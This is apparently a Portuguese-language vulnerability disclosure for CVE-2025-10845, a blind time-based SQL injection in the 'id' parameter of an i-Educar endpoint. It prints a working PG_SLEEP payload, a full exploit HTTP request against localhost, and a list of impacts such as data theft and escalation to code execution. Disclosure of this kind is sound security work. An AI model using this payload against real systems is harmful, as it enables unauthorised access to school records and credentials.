Featured image of post CVE-2025-10845

CVE-2025-10845

Injeção SQL

CVE-2025-10845: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro id do Endpoint module/ComponenteCurricular/view

Publicação CVE: https://www.cve.org/CVERecord?id=CVE-2025-10845

Resumo

Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro id do endpoint module/ComponenteCurricular/view. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.

Detalhes

O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro id. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.

PoC

Endpoint Vulnerável: module/ComponenteCurricular/view

Parâmetro: id

Payload:

1
' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ

Exemplo de Requisição

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1
Host: localhost:8086
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/138.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
Connection: keep-alive

Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.

Requisição normal:

Requisição modificada:

Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.

Impacto

  • Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).
  • Enumeração de banco de dados (esquemas, tabelas, usuários, versões).
  • Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).
  • Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.
  • Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.

Referência

https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md

Encontrado por

Karina Gante

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy